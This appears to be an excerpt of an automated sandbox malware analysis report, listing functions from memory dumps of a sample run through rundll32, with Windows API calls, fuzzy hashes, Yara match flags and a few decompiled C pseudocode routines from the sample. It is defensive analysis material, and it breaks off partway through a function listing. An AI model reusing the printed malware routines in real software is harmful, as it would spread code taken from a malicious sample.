                                              • Part of subcall function 0580FA32: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,00000000), ref: 0580FA40
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581CFB6
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0581D007
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,0000FDE9,00000000,00000001,00000080,00000000,00000008,00000000,0000FDE9,?), ref: 058034C6
                                              • Part of subcall function 05803486: GetLastError.KERNEL32 ref: 058034D0
                                              • Part of subcall function 05803486: WaitForSingleObject.KERNEL32(000000C8), ref: 058034F5
                                              • Part of subcall function 05803486: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000001,00000080,00000000), ref: 05803518
                                              • Part of subcall function 05803486: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 05803540
                                              • Part of subcall function 05803486: WriteFile.KERNEL32(?,00001388,?,?,00000000), ref: 05803555
                                              • Part of subcall function 05803486: SetEndOfFile.KERNEL32(?), ref: 05803562
                                              • Part of subcall function 05803486: CloseHandle.KERNEL32(?), ref: 0580357A
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 0581D03C
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001,?,?,?,?,?,?,05809EB6,?), ref: 0581D04C
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                                            • String ID:
                                            • API String ID: 4200334623-0
                                            • Opcode ID: c66474ada0a4cc23945936632876e72f692bfe9adea924a9060a31c9ab7e7c80
                                            • Instruction ID: 03a9e823eff0d4f0c7cfefb67d86424048fac8b6f13afd34d5d2963e7768f1e6
                                            • Opcode Fuzzy Hash: c66474ada0a4cc23945936632876e72f692bfe9adea924a9060a31c9ab7e7c80
                                            • Instruction Fuzzy Hash: 05312A76611119BFEB209FA4DC89CAEBFBDFF08250B108065FE06D3120DB71AD919B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580E628 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 0580E63F
                                            • SetEvent.KERNEL32(?,?,?,?,0580D3E9,?,?), ref: 0580E64F
                                            • GetLastError.KERNEL32 ref: 0580E6D8
                                              • Part of subcall function 0580E549: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00000000,?,?,?,05822953,0000EA60,?,?,?,0581C0C1,00000000,0000EA60,00000000), ref: 0580E564
                                              • Part of subcall function 0580C6B8: HeapFree.KERNEL32(00000000,00000000,05821A9A,00000000), ref: 0580C6C4
                                            • GetLastError.KERNEL32(00000000), ref: 0580E70D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                            • String ID:
                                            • API String ID: 602384898-0
                                            • Opcode ID: 3fddeb8c421cddd122c0d929cf3267378af4e33982a4babfb65cc30572afc6ea
                                            • Instruction ID: 001de75b0f839cc1d6885808ee7595f0be8c24b6fdcc3c22b5d2c97f567e15d6
                                            • Opcode Fuzzy Hash: 3fddeb8c421cddd122c0d929cf3267378af4e33982a4babfb65cc30572afc6ea
                                            • Instruction Fuzzy Hash: B031DDB5900309EFDB60DFA5DC849AFBBBDBF08204F10596AE952D2690D731EA449F21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058193A7 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            • TlsGetValue.KERNEL32(?), ref: 058193D6
                                            • SetEvent.KERNEL32(?), ref: 05819420
                                            • TlsSetValue.KERNEL32(00000001), ref: 0581945A
                                            • TlsSetValue.KERNEL32(00000000), ref: 05819476
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Value$Event
                                            • String ID:
                                            • API String ID: 3803239005-0
                                            • Opcode ID: dc9f38e2ffac39c507879ac6d1665b1c849f9c13c9d3e943d5c57c3631333d87
                                            • Instruction ID: f8f346a5077af5f44e2ff9c6cfb44001b2ca2f1e66ce7296c0e953b212370af0
                                            • Opcode Fuzzy Hash: dc9f38e2ffac39c507879ac6d1665b1c849f9c13c9d3e943d5c57c3631333d87
                                            • Instruction Fuzzy Hash: 70218031110204AFDB259F5ADC59AAA7FBAFF41350F104424FC56C7560D771EC91CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580F3E5 Relevance: 6.1, APIs: 4, Instructions: 83memoryregistryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0580F43E
                                            • memcpy.NTDLL(00000018,?,?), ref: 0580F467
                                            • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000C3EA,00000000,000000FF,00000008), ref: 0580F4A6
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580F4B9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                                            • String ID:
                                            • API String ID: 2780211928-0
                                            • Opcode ID: b248c87192227c57983ba6c6625c9d1331f569b99e213549d4e38e1bed247f35
                                            • Instruction ID: f3666b617fa9e7cdbc662585dc0ac968c7e102a0d40fbd1a1d6c709102ab16db
                                            • Opcode Fuzzy Hash: b248c87192227c57983ba6c6625c9d1331f569b99e213549d4e38e1bed247f35
                                            • Instruction Fuzzy Hash: CB315C71200605AFEB609F29DC45EAA7FA9FF04320F00C519FE5AD62A0DB74EC549BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05807924 Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581F4A1: memcpy.NTDLL(00000000,00000110,?,?,00000000,00000000,00000000,?,?,?,0580D3E9), ref: 0581F4D7
                                              • Part of subcall function 0581F4A1: memset.NTDLL ref: 0581F54D
                                              • Part of subcall function 0581F4A1: memset.NTDLL ref: 0581F561
                                            • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0580797C
                                            • lstrcmpi.KERNEL32(00000000,?), ref: 058079A3
                                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 058079E8
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000), ref: 058079F9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Freememset$Allocatelstrcmpimemcpy
                                            • String ID:
                                            • API String ID: 1065503980-0
                                            • Opcode ID: d5e0789f50a43bd17f1c59d171f35419dd6effb8821234258c3f85bd83937c7d
                                            • Instruction ID: 91ee763fe6f347ce3a317e3e748024f2346a855adfa301e247c82d93dce51944
                                            • Opcode Fuzzy Hash: d5e0789f50a43bd17f1c59d171f35419dd6effb8821234258c3f85bd83937c7d
                                            • Instruction Fuzzy Hash: 96215C71A00209FFDF21AFA5DC89AAE7FA9FB04354F108461FE05E6160DA34AD94CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058219D6 Relevance: 6.1, APIs: 4, Instructions: 77stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 05821A05
                                            • lstrlen.KERNEL32(00000000), ref: 05821A16
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • strcpy.NTDLL ref: 05821A2D
                                            • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 05821A37
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeaplstrlenmemsetstrcpy
                                            • String ID:
                                            • API String ID: 528014985-0
                                            • Opcode ID: 7fe334ce8d0ebe55a2c7fe081944100812c313a4395cadb1dfd843dafa02b26a
                                            • Instruction ID: 7c64ae1ef3c5bf92e68087534beb8b2c3c5e751ace49cd49eeb78d308aad6e2a
                                            • Opcode Fuzzy Hash: 7fe334ce8d0ebe55a2c7fe081944100812c313a4395cadb1dfd843dafa02b26a
                                            • Instruction Fuzzy Hash: 7521AF76614305AFEB209B68D84EB6A7FA8FB44311F14C419FD5BC7280EB75E884CB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F51D7 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E049F51D7(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E049F4DF6(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                                            0x049f51e3
                                            0x049f51e7
                                            0x049f51e8
                                            0x049f51e9
                                            0x049f51eb
                                            0x049f51ed
                                            0x049f51f0
                                            0x049f51f5
                                            0x049f528c
                                            0x049f5293
                                            0x049f5293
                                            0x049f51fe
                                            0x049f5205
                                            0x049f5215
                                            0x049f5215
                                            0x049f521b
                                            0x049f521d
                                            0x049f5222
                                            0x049f522b
                                            0x049f5231
                                            0x049f5236
                                            0x049f5241
                                            0x049f5245
                                            0x049f5247
                                            0x049f5248
                                            0x049f5251
                                            0x049f5255
                                            0x049f5266
                                            0x049f5257
                                            0x049f525c
                                            0x049f5261
                                            0x049f5270
                                            0x049f5270
                                            0x049f5245
                                            0x049f5276
                                            0x049f527c
                                            0x049f527c
                                            0x049f5285
                                            0x049f528a
                                            0x049f528a
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: FreeSleepStringlstrlenmemcpy
                                            • String ID:
                                            • API String ID: 1198164300-0
                                            • Opcode ID: f2b9408dc254b849527099e5e67d08bdcde2bada9a96de5f952a7bb820d48e08
                                            • Instruction ID: 3dfada8184be1677a79b097ba0314dd6882e1328a62db0d5d61923e3d6889323
                                            • Opcode Fuzzy Hash: f2b9408dc254b849527099e5e67d08bdcde2bada9a96de5f952a7bb820d48e08
                                            • Instruction Fuzzy Hash: 4F212A75900209FFCB11DFE8D8849DEBBB9FF89355B158279EA01A7211EB30EA01CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0582240D Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 05822423
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0582243E
                                            • GetLastError.KERNEL32 ref: 058224AC
                                            • GetLastError.KERNEL32 ref: 058224BB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalErrorLastSection$EnterLeave
                                            • String ID:
                                            • API String ID: 2124651672-0
                                            • Opcode ID: 6f1050b918b4f60ac15279543f7144db416e3fd954badc4dafb7e4200de55dbd
                                            • Instruction ID: 2a8d784facc8ce339f5c926372a460cea9602d0723bc5e42c7f40f767415b490
                                            • Opcode Fuzzy Hash: 6f1050b918b4f60ac15279543f7144db416e3fd954badc4dafb7e4200de55dbd
                                            • Instruction Fuzzy Hash: 83213C36900619EFCF11DF98D849A9E7FB4FF08720F018155FC06D2250CB34EA959B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058129F2 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 05812A14
                                            • lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 05812A58
                                            • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 05812A9B
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 05812ABE
                                              • Part of subcall function 0580BD6D: GetTickCount.KERNEL32 ref: 0580BD7D
                                              • Part of subcall function 0580BD6D: CreateFileW.KERNEL32(00000000,80000000,00000003,05829208,00000003,00000000,00000000,?,?,00000000), ref: 0580BD9A
                                              • Part of subcall function 0580BD6D: GetFileSize.KERNEL32(?,00000000,?,00000001,?,?,00000000), ref: 0580BDCD
                                              • Part of subcall function 0580BD6D: CreateFileMappingA.KERNEL32(00000000,05829208,00000002,00000000,00000000,?), ref: 0580BDE1
                                              • Part of subcall function 0580BD6D: lstrlen.KERNEL32(?,?,?,00000000), ref: 0580BDFD
                                              • Part of subcall function 0580BD6D: lstrcpy.KERNEL32(?,?), ref: 0580BE0D
                                              • Part of subcall function 0580BD6D: HeapFree.KERNEL32(00000000,?,?,?,00000000), ref: 0580BE28
                                              • Part of subcall function 0580BD6D: CloseHandle.KERNEL32(?,?), ref: 0580BE3A
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                                            • String ID:
                                            • API String ID: 3239194699-0
                                            • Opcode ID: c09ef3d0ee03735ad1820dfdd7912b4ba855e7b4092fe8f6fa2d9b6240d4ea7e
                                            • Instruction ID: 99466285da22ac570ad365f4c1f715df5b7c992fb4b98158fb17e2ddbe249f36
                                            • Opcode Fuzzy Hash: c09ef3d0ee03735ad1820dfdd7912b4ba855e7b4092fe8f6fa2d9b6240d4ea7e
                                            • Instruction Fuzzy Hash: 65213731600208AADB21EFA6EC48DEE7BB9FF48354F140125FD26E21A0E7309845CB65
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581A17B Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 05803AEB: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0581A192), ref: 05803B11
                                            • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00001003,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0581A1CD
                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,0580A61B,?), ref: 0581A1DF
                                            • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,0580A61B,?), ref: 0581A1F7
                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,0580A61B,?), ref: 0581A212
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: File$CloseCreateHandleModuleNamePointerRead
                                            • String ID:
                                            • API String ID: 1352878660-0
                                            • Opcode ID: 4d669c810b3c63a9ba3449b78cf2ba5688ddfbeb4bf36f4a2f269724b3979561
                                            • Instruction ID: 2a7ecb87373637b4d73bf20c35d519a1d6f502a40f64987762388bec3e540b46
                                            • Opcode Fuzzy Hash: 4d669c810b3c63a9ba3449b78cf2ba5688ddfbeb4bf36f4a2f269724b3979561
                                            • Instruction Fuzzy Hash: 04118B71602228BADF21ABA5CC89EEFBE6DEF05650F104111FD15E6090D7319E80CBE5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580414B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?), ref: 0580415B
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001), ref: 0580417D
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 058041A9
                                            • lstrcatW.KERNEL32(00000000,?), ref: 058041BC
                                              • Part of subcall function 05806C62: strstr.NTDLL ref: 05806D3A
                                              • Part of subcall function 05806C62: strstr.NTDLL ref: 05806D8D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 3712611166-0
                                            • Opcode ID: ac2d6b4d12b829a9194fe3410bf98cc06c69fcf65aacdfb60279a66c75991d77
                                            • Instruction ID: 29a38de915567cf60622c697c64d4df8e75deac8a8ec170b00e482cabe2d2ea8
                                            • Opcode Fuzzy Hash: ac2d6b4d12b829a9194fe3410bf98cc06c69fcf65aacdfb60279a66c75991d77
                                            • Instruction Fuzzy Hash: 8C112976100119BFDF11AFA6DC88C9E7FADEF19255B009025FE05D6160DB31EE519BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058150C5 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?,?,?,?,05801765), ref: 058150FD
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • lstrcpy.KERNEL32(00000000,?), ref: 05815114
                                            • StrChrA.SHLWAPI(00000000,0000002E,?,?,05801765), ref: 0581511D
                                            • GetModuleHandleA.KERNEL32(00000000,?,?,05801765), ref: 0581513B
                                              • Part of subcall function 05817DF1: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000000,00000000,?,00000000,05801765,00000000,00000004,?,00000000,?), ref: 05817EC9
                                              • Part of subcall function 05817DF1: VirtualProtect.KERNEL32(?,00000004,?,?,00000000,05801765,00000000,00000004,?,00000000,?,00000000,?,058250A8,0000001C,0581E844), ref: 05817EE4
                                              • Part of subcall function 05817DF1: RtlEnterCriticalSection.NTDLL(05829420), ref: 05817F09
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                                            • String ID:
                                            • API String ID: 105881616-0
                                            • Opcode ID: fd4db34e5ba97eb9a37274900b1c37c1f0d4553f48d4e02f9ca010bf9a05cc1f
                                            • Instruction ID: 840b0327344f5d9ba38b6976008d4587989be5db19155f36424b3b18f373e29f
                                            • Opcode Fuzzy Hash: fd4db34e5ba97eb9a37274900b1c37c1f0d4553f48d4e02f9ca010bf9a05cc1f
                                            • Instruction Fuzzy Hash: 97210E74A00309AFCB22EF68C848AAEBBF9BF85704F148059EC06D7250E774D945CF55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05805788 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 058057A3
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 058057C7
                                            • RegCloseKey.ADVAPI32(?), ref: 0580581F
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 058057F0
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: QueryValue$AllocateCloseHeapOpen
                                            • String ID:
                                            • API String ID: 453107315-0
                                            • Opcode ID: 7644c9d749b66109a2b8da4eb0e588197d54c016972efcb4d1bebab128ad1099
                                            • Instruction ID: 38a43a693fa1133766d9766faef7a423699d45c23dbaa4f6a57f34099193b62a
                                            • Opcode Fuzzy Hash: 7644c9d749b66109a2b8da4eb0e588197d54c016972efcb4d1bebab128ad1099
                                            • Instruction Fuzzy Hash: 6821E3B5910208FFDF119F98CC858EEBFBDEB88741B208466EC02E7150D6319E819F60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F72E7 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E049F72E7(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x49fa2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x49fa2f0; // 0x4310c43e
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x49fa2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                            0x049f72ef
                                            0x049f72f2
                                            0x049f72f8
                                            0x049f7310
                                            0x049f7312
                                            0x049f7317
                                            0x049f7319
                                            0x049f731c
                                            0x049f731e
                                            0x049f7321
                                            0x049f7323
                                            0x049f7323
                                            0x049f7325
                                            0x049f7330
                                            0x049f7335
                                            0x049f7346
                                            0x049f734e
                                            0x049f7353
                                            0x049f7356
                                            0x049f7359
                                            0x049f735b
                                            0x049f735e
                                            0x049f7361
                                            0x049f7361
                                            0x049f7364
                                            0x049f736f
                                            0x049f7374
                                            0x049f737e

                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,049F37CC,00000000,?,?,049F653D,?,04F795B0), ref: 049F72F2
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 049F730A
                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,049F37CC,00000000,?,?,049F653D,?,04F795B0), ref: 049F734E
                                            • memcpy.NTDLL(00000001,?,00000001), ref: 049F736F
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: memcpy$AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 1819133394-0
                                            • Opcode ID: e9391b9cacc7d8ec575e406f440c268f4ba63de7328f7deedb4c3b969626d340
                                            • Instruction ID: 2fc1ea34efa0c8c60abbb891acb3132daf8b641ed479d39978b6bcd609fc145c
                                            • Opcode Fuzzy Hash: e9391b9cacc7d8ec575e406f440c268f4ba63de7328f7deedb4c3b969626d340
                                            • Instruction Fuzzy Hash: FF11C672B04215BFD7148FA9DC84D9EBFAEEBD4360B1502B6F904D7250E775AE0487A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05815798 Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0580A27D,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 058157A3
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 058157BB
                                            • memcpy.NTDLL(00000000,?,-00000008,?,?,?,0580A27D,00000000,?,?,0580ACCC,00000000,05D7C310), ref: 058157FF
                                            • memcpy.NTDLL(00000001,?,00000001,?,?,?), ref: 05815820
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: memcpy$AllocateHeaplstrlen
                                            • String ID:
                                            • API String ID: 1819133394-0
                                            • Opcode ID: bb30112c90de808992c04ecb3d8e3b2d96f14000bde09c61b31aaed217ccc924
                                            • Instruction ID: 5fb36fa9fbfe16e08f476f5402a8910b8e359dac2109e49c8b7232ae2b20f20f
                                            • Opcode Fuzzy Hash: bb30112c90de808992c04ecb3d8e3b2d96f14000bde09c61b31aaed217ccc924
                                            • Instruction Fuzzy Hash: 16112972A00214BFD7208B6ADC89D9EBFEEEBC1660B054176FD06D7140EA709E009BA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580F1D4 Relevance: 6.1, APIs: 4, Instructions: 58threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalFix.KERNEL32(00000000), ref: 0580F214
                                            • memset.NTDLL ref: 0580F228
                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 0580F235
